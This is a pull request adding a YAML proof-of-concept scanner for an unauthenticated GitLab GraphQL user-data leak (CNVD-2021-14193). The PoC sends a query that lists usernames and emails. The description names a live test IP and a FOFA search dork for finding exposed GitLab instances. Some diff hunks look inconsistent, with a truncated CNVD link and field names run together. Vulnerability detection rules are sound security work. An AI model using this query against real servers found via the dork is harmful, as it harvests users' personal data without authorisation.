### PR TITLE
GitLab_api.graphql未授权信息泄露(CNVD-2021-14193)

### DIFF
--- a/pocs/gitlab-cnvd-2021-14193-unauth.yml
+++ b/pocs/gitlab-cnvd-2021-14193-unauth.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-gitlib-cnvd-2021-14193-unauth
+name: poc-yaml-gitlab-cnvd-2021-14193-unauth
 rules:
   - method: GET
     path: "/users/sign_in"
@@ -18,4 +18,4 @@ detail:
   author: tangshoupu
   info: GitLab_api.graphql-cnvd-2021-14193-unauth
   links:
-    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-1419
+    - http://cn-sec.com/archives/284853.html

--- a/pocs/gitlib-cnvd-2021-14193-unauth.yml
+++ b/pocs/gitlib-cnvd-2021-14193-unauth.yml
@@ -1,0 +1,21 @@
+name: poc-yaml-gitlib-cnvd-2021-14193-unauth
+rules:
+  - method: GET
+    path: "/users/sign_in"
+    follow_redirects: false
+    expression: 
+      response.body.bcontains(bytes(string("gitlab"))) && response.status == 200
+  - method: POST
+    path: "/api/graphql"
+    headers:
+      Content-Type: application/json
+    follow_redirects: false
+    body: |
+      {"query":"{users {edges {  node {    username    email    avatarUrl    status {      emoji      message      messageHtml     }    }   }  } }","variables":null,"operationName":null}
+    expression: 
+      response.status == 200 && response.body.bcontains(b"users") && response.body.bcontains(b"email") && response.body.bcontains(b"username") 
+detail:
+  author: tangshoupu
+  info: GitLab_api.graphql未授权信息泄露(CNVD-2021-14193)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193

--- a/pocs/gitlib-cnvd-2021-14193-unauth.yml
+++ b/pocs/gitlib-cnvd-2021-14193-unauth.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: "/users/sign_in"
     follow_redirects: false
-    expression: 
+    expression:
       response.body.bcontains(bytes(string("gitlab"))) && response.status == 200
   - method: POST
     path: "/api/graphql"
@@ -11,9 +11,9 @@ rules:
       Content-Type: application/json
     follow_redirects: false
     body: |
-      {"query":"{users {edges {  node {    username    email    avatarUrl    status {      emoji      message      messageHtml     }    }   }  } }","variables":null,"operationName":null}
-    expression: 
-      response.status == 200 && response.body.bcontains(b"users") && response.body.bcontains(b"email") && response.body.bcontains(b"username") 
+      {"query":"{users{edges{node{usernameemailavatarUrlstatus{emojimessagemessageHtml}}}}}","variables":null,"operationName":null}
+    expression:
+      response.status == 200 && response.body.bcontains(b"users") && response.body.bcontains(b"email") && response.body.bcontains(b"username")
 detail:
   author: tangshoupu
   info: GitLab_api.graphql-cnvd-2021-14193-unauth

--- a/pocs/gitlib-cnvd-2021-14193-unauth.yml
+++ b/pocs/gitlib-cnvd-2021-14193-unauth.yml
@@ -16,6 +16,6 @@ rules:
       response.status == 200 && response.body.bcontains(b"users") && response.body.bcontains(b"email") && response.body.bcontains(b"username") 
 detail:
   author: tangshoupu
-  info: GitLab_api.graphql未授权信息泄露(CNVD-2021-14193)
+  info: GitLab_api.graphql-cnvd-2021-14193-unauth
   links:
-    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-1419


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
GitLab_api.graphql未授权信息泄露(CNVD-2021-14193)

## 测试环境
 http://76.68.188.152
## 备注
### fofa语法：title="Sign in · GitLab" && country="CN"  影响非常大
![image](https://user-images.githubusercontent.com/50769953/119933709-24d54400-bf74-11eb-9124-9cef1f72048e.png)
